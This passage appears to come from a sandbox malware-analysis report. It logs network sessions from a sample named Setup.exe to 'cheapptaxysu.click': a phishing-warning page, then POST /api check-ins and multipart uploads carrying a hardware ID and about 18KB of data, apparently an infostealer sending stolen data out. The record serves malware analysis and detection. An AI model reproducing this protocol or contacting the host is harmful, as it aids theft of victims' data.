                                                                                                                                      2024-12-30 20:29:11 UTC1369INData Raw: 69 2f 73 74 79 6c 65 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42
                                                                                                                                      Data Ascii: i/styles/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementB
                                                                                                                                      2024-12-30 20:29:11 UTC1369INData Raw: 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 34 30 34 30 34 30 3b 20 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 62 6f 72 64 65 72 3a 20 30 3b 22 3e 4c 65 61 72 6e 20 4d 6f 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 66 6f 72 6d 20 61 63
                                                                                                                                      Data Ascii: <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn" style="background-color: #404040; color: #fff; border: 0;">Learn More</a> <form ac
                                                                                                                                      2024-12-30 20:29:11 UTC1009INData Raw: 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 2d 62 74 6e 22 3e 43 6c 69 63 6b 20 74 6f 20 72 65 76 65 61 6c 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 73 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72
                                                                                                                                      Data Ascii: ass="cf-footer-ip-reveal-btn">Click to reveal</button> <span class="hidden" id="cf-footer-ip">8.46.123.189</span> <span class="cf-footer-separator sm:hidden">&bull;</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Per
                                                                                                                                      2024-12-30 20:29:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.2.449734172.67.177.884437412C:\Users\user\Desktop\Setup.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 20:29:11 UTC355OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Cookie: __cf_mw_byp=4ES7po80595fIjJPhQxgt5vlBy1.qekvq8p3kvm4hDY-1735590551-0.0.1.1-/api
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 42
                                                                                                                                      Host: cheapptaxysu.click
                                                                                                                                      2024-12-30 20:29:11 UTC42OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 43 5a 4a 76 73 73 2d 2d 26 6a 3d
                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=CZJvss--&j=
                                                                                                                                      2024-12-30 20:29:12 UTC1132INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 30 Dec 2024 20:29:12 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=ag91j7ngmgafcjkfitn2ogenil; expires=Fri, 25 Apr 2025 14:15:51 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RQ7Kix5xPrw7hpr2T4%2BnvrJE1SWNoj87e7WD8xKjmT7UjH3tbccievTFUVupjEhQYTAv5CpLFB%2B6mX195FDE3ueBHrk%2BTxV746W3jKbJr%2FhInie6yz736dWaJ%2F48JJv1ZqBy76c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8fa4c7d68b5f15d7-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1611&min_rtt=1545&rtt_var=627&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1033&delivery_rate=1889967&cwnd=225&unsent_bytes=0&cid=d9980bc8c0ecbb94&ts=476&x=0"
                                                                                                                                      2024-12-30 20:29:12 UTC237INData Raw: 34 39 39 34 0d 0a 35 6b 58 64 67 6d 66 4a 37 42 78 6d 45 74 75 52 55 57 74 51 74 4f 6e 6a 76 51 58 58 7a 2b 51 68 53 6c 6b 30 4f 55 36 33 69 7a 65 64 5a 36 75 67 58 66 33 41 50 68 56 33 2b 61 73 6c 47 53 58 52 78 63 48 63 59 66 58 31 67 6b 41 6d 4b 6c 45 56 62 4d 48 6d 46 64 77 6a 76 4f 34 55 72 4d 41 2b 41 32 72 35 71 77 6f 51 63 74 47 48 77 59 63 6e 73 71 57 47 51 43 59 37 56 56 49 68 78 2b 64 55 6a 69 6d 36 36 67 4b 71 69 48 30 4b 66 37 37 30 4e 41 6f 36 32 6f 43 4f 31 57 6a 31 34 38 5a 45 4d 48 73 4f 47 77 50 53 2f 31 61 72 4a 4b 37 70 52 62 54 41 5a 30 52 33 74 62 4e 72 53 54 48 52 69 34 2f 62 59 62 79 6e 6a 45 6b 75 4f 6c 42 54 50 74 37 74 58 34 34 6e 75 65 73 49 6f 35 78 77 41 48 69 31 38 6a 34
                                                                                                                                      Data Ascii: 49945kXdgmfJ7BxmEtuRUWtQtOnjvQXXz+QhSlk0OU63izedZ6ugXf3APhV3+aslGSXRxcHcYfX1gkAmKlEVbMHmFdwjvO4UrMA+A2r5qwoQctGHwYcnsqWGQCY7VVIhx+dUjim66gKqiH0Kf770NAo62oCO1Wj148ZEMHsOGwPS/1arJK7pRbTAZ0R3tbNrSTHRi4/bYbynjEkuOlBTPt7tX44nuesIo5xwAHi18j4
                                                                                                                                      2024-12-30 20:29:12 UTC1369INData Raw: 4b 63 70 6a 4c 68 73 63 6e 37 65 33 56 63 53 73 71 52 30 34 68 78 65 38 56 6d 32 6d 6d 6f 41 4b 6e 7a 69 5a 45 65 4c 58 39 4e 67 6f 39 30 59 71 42 7a 57 69 31 72 6f 35 4c 4c 44 46 5a 56 43 50 62 34 31 4b 4d 4c 72 6a 76 41 71 4f 49 63 51 63 77 39 37 4d 30 45 58 4b 4f 79 36 48 50 5a 4c 61 35 69 31 4a 6f 4a 42 68 43 62 4e 4c 6c 46 64 78 6e 75 65 34 45 70 6f 35 73 44 48 75 79 39 69 45 43 4f 39 75 47 67 64 4a 74 75 71 36 47 52 43 49 78 57 56 45 6f 32 4f 52 54 68 43 66 2f 72 6b 57 73 6c 6a 35 63 4d 4a 72 32 49 77 34 2b 77 4d 6d 37 6e 33 6a 37 74 4d 5a 45 4a 48 73 4f 47 79 54 51 36 6c 61 50 4b 4c 7a 6f 44 72 6d 4f 62 41 4a 39 76 4f 45 31 44 44 7a 63 69 4a 50 56 61 62 4f 75 6a 30 67 68 50 6c 46 66 62 4a 75 70 55 70 78 6e 35 36 41 6b 70 6f 56 79 44 6d 65 35 73 79
                                                                                                                                      Data Ascii: KcpjLhscn7e3VcSsqR04hxe8Vm2mmoAKnziZEeLX9Ngo90YqBzWi1ro5LLDFZVCPb41KMLrjvAqOIcQcw97M0EXKOy6HPZLa5i1JoJBhCbNLlFdxnue4Epo5sDHuy9iECO9uGgdJtuq6GRCIxWVEo2ORThCf/rkWslj5cMJr2Iw4+wMm7n3j7tMZEJHsOGyTQ6laPKLzoDrmObAJ9vOE1DDzciJPVabOuj0ghPlFfbJupUpxn56AkpoVyDme5sy
                                                                                                                                      2024-12-30 20:29:12 UTC1369INData Raw: 68 35 50 54 62 62 4f 69 69 30 39 6f 64 52 5a 63 4e 4a 57 78 46 61 34 6b 71 2b 4d 50 36 62 74 39 43 6e 36 2b 35 58 4d 57 66 4d 2f 4c 68 74 4d 6e 37 65 32 4c 51 69 41 39 52 46 51 68 31 75 64 62 69 79 4b 77 36 41 57 72 67 33 73 41 65 37 4c 77 50 67 30 67 33 49 75 4a 32 6d 61 2f 70 38 59 4e 61 44 78 4f 47 33 53 56 32 45 4b 50 5a 59 72 6a 43 36 57 4a 61 45 52 76 39 2b 70 7a 44 6a 36 57 30 38 48 53 62 37 43 6f 69 55 49 69 4e 56 4e 52 49 4e 33 6e 56 70 59 6f 75 2b 41 4a 6f 34 52 7a 43 6e 53 78 2b 6a 67 43 4e 4e 61 4b 69 35 38 70 39 61 71 65 41 33 42 37 59 6c 77 67 32 4f 59 58 73 53 53 78 37 67 4b 39 7a 6d 46 4b 61 66 6e 30 50 30 6c 71 6c 6f 65 49 33 32 79 2f 71 59 5a 45 4a 54 35 56 58 43 2f 59 37 6c 2b 4b 49 4c 76 73 44 4b 61 49 66 67 4e 30 76 4f 45 32 41 44 37
                                                                                                                                      Data Ascii: h5PTbbOii09odRZcNJWxFa4kq+MP6bt9Cn6+5XMWfM/LhtMn7e2LQiA9RFQh1udbiyKw6AWrg3sAe7LwPg0g3IuJ2ma/p8YNaDxOG3SV2EKPZYrjC6WJaERv9+pzDj6W08HSb7CoiUIiNVNRIN3nVpYou+AJo4RzCnSx+jgCNNaKi58p9aqeA3B7Ylwg2OYXsSSx7gK9zmFKafn0P0lqloeI32y/qYZEJT5VXC/Y7l+KILvsDKaIfgN0vOE2AD7
                                                                                                                                      2024-12-30 20:29:12 UTC1369INData Raw: 58 48 31 73 73 68 61 61 44 78 61 47 33 53 56 34 46 79 57 4b 62 48 70 43 4b 32 47 65 51 70 39 73 76 55 34 44 6a 58 51 68 6f 6e 53 59 72 61 73 67 6b 6b 36 4f 46 31 52 49 64 2b 70 47 38 51 67 70 36 42 64 36 36 6c 79 4c 57 43 69 34 53 56 4a 4c 5a 69 53 77 64 68 72 39 66 58 47 51 43 63 79 57 56 4d 6b 32 75 5a 52 69 69 47 35 37 51 43 6b 68 47 77 4d 66 72 54 34 50 41 49 67 31 6f 61 46 30 32 4f 39 70 6f 77 44 5a 6e 74 52 51 32 79 4e 71 57 43 4a 4b 4c 2f 6a 45 2b 75 52 4d 42 30 77 76 76 39 7a 55 58 4c 61 68 59 48 51 61 37 6d 6d 6a 6b 49 6b 4e 56 46 65 4a 64 33 68 52 34 55 6a 74 2b 45 4c 70 49 39 36 41 58 57 39 39 44 63 50 50 5a 62 46 77 64 68 2f 39 66 58 47 62 41 38 4f 46 48 6f 57 6c 66 59 62 6e 57 65 34 37 45 58 7a 7a 6e 49 48 66 4c 48 38 4e 51 41 2b 33 49 4b 4b
                                                                                                                                      Data Ascii: XH1sshaaDxaG3SV4FyWKbHpCK2GeQp9svU4DjXQhonSYrasgkk6OF1RId+pG8Qgp6Bd66lyLWCi4SVJLZiSwdhr9fXGQCcyWVMk2uZRiiG57QCkhGwMfrT4PAIg1oaF02O9powDZntRQ2yNqWCJKL/jE+uRMB0wvv9zUXLahYHQa7mmjkIkNVFeJd3hR4Ujt+ELpI96AXW99DcPPZbFwdh/9fXGbA8OFHoWlfYbnWe47EXzznIHfLH8NQA+3IKK
                                                                                                                                      2024-12-30 20:29:12 UTC1369INData Raw: 6d 46 52 79 30 30 56 31 6f 71 78 2b 35 63 6c 69 6d 79 37 77 32 6a 68 33 38 41 64 62 54 31 50 77 4d 7a 30 59 57 50 31 79 66 37 37 59 46 62 61 47 4d 57 65 6a 7a 4f 2b 30 4f 4a 42 72 4c 76 52 62 54 41 5a 30 52 33 74 62 4e 72 53 54 76 45 6a 34 7a 4e 62 72 4b 6a 69 55 41 36 4f 6c 74 51 50 74 4c 6d 55 59 4d 72 75 65 38 44 71 6f 74 30 43 48 65 38 2b 44 77 46 63 70 6a 4c 68 73 63 6e 37 65 32 6f 53 44 73 73 56 56 55 6e 77 2f 49 56 6d 32 6d 6d 6f 41 4b 6e 7a 69 5a 45 63 37 4c 34 4e 77 6b 2b 31 6f 2b 4d 33 33 57 36 71 6f 46 4b 49 79 6c 63 58 43 76 65 34 56 36 4c 49 61 33 73 43 37 6d 4c 62 42 59 77 39 37 4d 30 45 58 4b 4f 79 37 66 59 64 36 57 75 78 48 49 2b 4f 45 42 51 49 64 6d 70 53 73 6f 2b 2f 2b 63 4a 36 39 59 2b 41 6e 2b 77 38 44 77 49 4f 39 71 47 68 4e 5a 69 74
                                                                                                                                      Data Ascii: mFRy00V1oqx+5climy7w2jh38AdbT1PwMz0YWP1yf77YFbaGMWejzO+0OJBrLvRbTAZ0R3tbNrSTvEj4zNbrKjiUA6OltQPtLmUYMrue8Dqot0CHe8+DwFcpjLhscn7e2oSDssVVUnw/IVm2mmoAKnziZEc7L4Nwk+1o+M33W6qoFKIylcXCve4V6LIa3sC7mLbBYw97M0EXKOy7fYd6WuxHI+OEBQIdmpSso+/+cJ69Y+An+w8DwIO9qGhNZit
                                                                                                                                      2024-12-30 20:29:12 UTC1369INData Raw: 6d 43 56 56 41 62 4d 71 6e 54 4d 51 67 73 36 42 64 36 34 31 35 42 33 47 7a 2b 6a 38 47 4e 64 4b 5a 69 39 68 31 74 4b 79 4e 54 69 51 37 57 31 59 6d 31 4f 42 59 69 43 71 34 35 77 71 75 7a 6a 42 45 64 36 47 7a 61 30 6b 54 32 34 43 4e 68 44 33 31 73 73 68 61 61 44 78 61 47 33 53 56 36 56 2b 42 4c 62 4c 6a 43 71 69 63 66 77 4a 69 75 66 34 35 47 7a 6a 64 6a 6f 7a 53 61 72 61 72 67 45 67 6b 4b 56 39 62 4c 39 36 70 47 38 51 67 70 36 42 64 36 36 31 70 45 6e 71 2b 2f 79 55 43 4d 39 57 64 6a 4d 38 6e 2b 2b 32 58 52 44 6c 37 44 6b 30 38 77 75 35 4b 79 6a 37 2f 35 77 6e 72 31 6a 34 43 65 62 2f 30 4e 51 63 67 30 34 32 4f 30 47 36 38 71 59 35 41 4b 44 39 53 58 43 6e 57 35 56 36 44 4a 4c 44 6b 44 4b 57 48 63 55 51 2b 2b 66 51 72 53 57 71 57 71 70 72 63 61 37 6a 74 6d 51
                                                                                                                                      Data Ascii: mCVVAbMqnTMQgs6Bd6415B3Gz+j8GNdKZi9h1tKyNTiQ7W1Ym1OBYiCq45wquzjBEd6Gza0kT24CNhD31sshaaDxaG3SV6V+BLbLjCqicfwJiuf45GzjdjozSarargEgkKV9bL96pG8Qgp6Bd661pEnq+/yUCM9WdjM8n++2XRDl7Dk08wu5Kyj7/5wnr1j4Ceb/0NQcg042O0G68qY5AKD9SXCnW5V6DJLDkDKWHcUQ++fQrSWqWqprca7jtmQ
                                                                                                                                      2024-12-30 20:29:12 UTC1369INData Raw: 46 57 7a 53 38 52 58 63 5a 35 2f 72 45 36 36 4a 61 45 5a 46 75 76 30 39 44 69 53 57 6c 4c 36 52 4a 37 71 33 78 68 73 52 49 68 5a 63 49 4a 57 78 46 5a 45 67 76 2b 63 66 76 59 6c 79 46 58 75 30 2f 78 45 47 4e 63 43 49 6a 74 78 32 76 4f 47 4e 54 6d 68 31 46 6c 77 30 6c 62 45 56 71 79 43 70 34 79 71 6f 6e 33 64 45 50 76 6e 30 4a 55 6c 71 6c 72 58 42 7a 57 53 6c 72 6f 6c 53 46 6e 73 4f 51 68 4b 56 34 6b 4f 44 4e 37 7a 32 44 71 61 43 62 7a 6f 77 34 61 64 68 57 32 43 45 32 5a 36 66 65 49 72 6a 78 6b 4a 6f 59 32 39 43 62 4d 4f 70 44 64 5a 70 2f 2f 4a 46 38 38 34 35 42 32 4b 72 39 54 41 66 4d 5a 47 31 76 2f 68 78 76 36 71 57 52 44 38 30 46 68 56 73 32 71 6b 4e 76 57 65 32 35 78 36 36 6d 48 4d 55 64 2f 6e 4d 66 55 6b 71 6c 74 50 42 36 6d 53 37 6f 34 46 56 4f 58 5a
                                                                                                                                      Data Ascii: FWzS8RXcZ5/rE66JaEZFuv09DiSWlL6RJ7q3xhsRIhZcIJWxFZEgv+cfvYlyFXu0/xEGNcCIjtx2vOGNTmh1Flw0lbEVqyCp4yqon3dEPvn0JUlqlrXBzWSlrolSFnsOQhKV4kODN7z2DqaCbzow4adhW2CE2Z6feIrjxkJoY29CbMOpDdZp//JF8845B2Kr9TAfMZG1v/hxv6qWRD80FhVs2qkNvWe25x66mHMUd/nMfUkqltPB6mS7o4FVOXZ
                                                                                                                                      2024-12-30 20:29:12 UTC1369INData Raw: 65 46 45 69 53 76 2f 72 6b 57 2b 68 58 49 43 66 61 79 38 49 68 38 78 77 49 7a 4e 31 33 61 34 6f 63 5a 38 5a 6e 74 4f 47 33 53 56 33 46 61 4b 4b 62 6a 32 46 4f 61 75 64 51 68 7a 74 66 49 30 53 58 79 57 6a 63 47 48 4e 50 76 74 67 6c 4a 6f 59 77 59 4a 64 34 43 36 41 74 52 31 6f 4b 34 63 36 35 67 2b 58 43 4c 33 73 79 46 4a 61 70 62 4d 67 73 31 31 73 36 36 51 51 47 38 46 61 46 6f 68 32 71 56 62 6a 79 65 34 38 42 4f 77 77 6e 59 48 61 71 50 4e 44 53 49 2b 30 49 79 62 32 47 47 54 6a 63 59 4e 61 44 51 57 41 78 57 56 6f 52 57 37 61 66 2f 34 52 66 50 4f 53 77 64 2b 74 2f 51 6c 47 48 2f 2b 71 4c 76 6c 4a 5a 6d 71 6b 77 45 63 50 45 5a 4b 4a 39 6a 6c 46 63 70 6e 75 61 42 64 2b 38 41 2b 41 47 48 35 71 32 4e 62 61 59 50 59 31 6f 38 31 71 75 4f 66 41 7a 35 37 44 67 6c 69
                                                                                                                                      Data Ascii: eFEiSv/rkW+hXICfay8Ih8xwIzN13a4ocZ8ZntOG3SV3FaKKbj2FOaudQhztfI0SXyWjcGHNPvtglJoYwYJd4C6AtR1oK4c65g+XCL3syFJapbMgs11s66QQG8FaFoh2qVbjye48BOwwnYHaqPNDSI+0Iyb2GGTjcYNaDQWAxWVoRW7af/4RfPOSwd+t/QlGH/+qLvlJZmqkwEcPEZKJ9jlFcpnuaBd+8A+AGH5q2NbaYPY1o81quOfAz57Dgli
                                                                                                                                      2024-12-30 20:29:12 UTC1369INData Raw: 31 6e 71 61 42 64 2b 4d 41 2b 46 6a 44 68 73 33 51 48 50 39 65 49 6a 39 78 31 70 36 75 46 56 53 74 38 61 47 55 4a 32 4f 52 51 69 69 43 42 33 69 53 68 6e 6e 4d 4c 64 2f 76 54 4e 42 38 78 36 4c 57 32 7a 6d 43 6c 37 36 42 41 50 6a 67 57 46 57 7a 4e 71 51 33 45 42 72 58 77 43 4b 53 4a 50 43 52 33 72 2f 42 7a 52 33 4c 53 79 39 6d 66 51 72 69 67 67 30 30 76 65 58 64 52 50 4e 6a 6d 55 73 59 48 75 50 59 47 36 38 41 2b 43 44 44 68 73 7a 49 44 49 74 75 45 68 70 4e 67 72 36 72 47 44 57 67 31 46 67 4e 73 31 4f 4e 46 69 53 69 34 72 41 4f 6c 67 44 34 62 50 71 43 7a 4a 55 6c 71 68 63 58 42 7a 53 66 74 37 63 46 41 4f 69 6c 51 57 44 72 57 72 6d 75 36 43 71 33 6e 46 61 6a 4d 54 77 6c 30 72 2b 59 77 47 54 58 6f 74 61 7a 4e 59 4b 57 75 78 48 49 2b 4f 46 5a 56 4b 35 57 6e 46
                                                                                                                                      Data Ascii: 1nqaBd+MA+FjDhs3QHP9eIj9x1p6uFVSt8aGUJ2ORQiiCB3iShnnMLd/vTNB8x6LW2zmCl76BAPjgWFWzNqQ3EBrXwCKSJPCR3r/BzR3LSy9mfQrigg00veXdRPNjmUsYHuPYG68A+CDDhszIDItuEhpNgr6rGDWg1FgNs1ONFiSi4rAOlgD4bPqCzJUlqhcXBzSft7cFAOilQWDrWrmu6Cq3nFajMTwl0r+YwGTXotazNYKWuxHI+OFZVK5WnF


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      2192.168.2.449737172.67.177.884437412C:\Users\user\Desktop\Setup.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 20:29:13 UTC373OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=KMFSF0FIQR07XEC7DE
                                                                                                                                      Cookie: __cf_mw_byp=4ES7po80595fIjJPhQxgt5vlBy1.qekvq8p3kvm4hDY-1735590551-0.0.1.1-/api
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                      Content-Length: 18158
                                                                                                                                      Host: cheapptaxysu.click
                                                                                                                                      2024-12-30 20:29:13 UTC15331OUTData Raw: 2d 2d 4b 4d 46 53 46 30 46 49 51 52 30 37 58 45 43 37 44 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 32 37 37 33 43 33 31 34 35 35 32 32 43 46 43 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 4b 4d 46 53 46 30 46 49 51 52 30 37 58 45 43 37 44 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4b 4d 46 53 46 30 46 49 51 52 30 37 58 45 43 37 44 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 43 5a 4a 76 73 73 2d 2d 0d 0a 2d 2d 4b
                                                                                                                                      Data Ascii: --KMFSF0FIQR07XEC7DEContent-Disposition: form-data; name="hwid"22773C3145522CFCBEBA0C6A975F1733--KMFSF0FIQR07XEC7DEContent-Disposition: form-data; name="pid"2--KMFSF0FIQR07XEC7DEContent-Disposition: form-data; name="lid"CZJvss----K
                                                                                                                                      2024-12-30 20:29:13 UTC2827OUTData Raw: 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af
                                                                                                                                      Data Ascii: 5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6
                                                                                                                                      2024-12-30 20:29:25 UTC1129INHTTP/1.1 200 OK
                                                                                                                                      Date: Mon, 30 Dec 2024 20:29:25 GMT
                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      Set-Cookie: PHPSESSID=hii8vuv7aug0k5n3oi2la61244; expires=Fri, 25 Apr 2025 14:16:03 GMT; Max-Age=9999999; path=/
                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                      Pragma: no-cache
                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      vary: accept-encoding
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jxUm4WiK7vbTZOKYleBgxsdFtNeEpO8exEcEtIGyP2hwSkYzGDBghc68aA8mRixSsx5EuckYdSWfBRs5YgQCY6nTnNbP7rnsLVv7Hu%2BMHIfwat1rT06HIyPp7IEtgvS4itimpk8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 8fa4c7de0e8917a9-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1605&min_rtt=1568&rtt_var=615&sent=11&recv=22&lost=0&retrans=0&sent_bytes=2843&recv_bytes=19211&delivery_rate=1862244&cwnd=238&unsent_bytes=0&cid=ceec34615e8495f8&ts=11828&x=0"
                                                                                                                                      2024-12-30 20:29:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                                                      2024-12-30 20:29:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                      Data Ascii: 0


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      3192.168.2.449742172.67.177.884437412C:\Users\user\Desktop\Setup.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-12-30 20:29:25 UTC364OUTPOST /api HTTP/1.1
                                                                                                                                      Connection: Keep-Alive
                                                                                                                                      Content-Type: multipart/form-data; boundary=C4WY7CSX22
                                                                                                                                      Cookie: __cf_mw_byp=4ES7po80595fIjJPhQxgt5vlBy1.qekvq8p3kvm4hDY-1735590551-0.0.1.1-/api
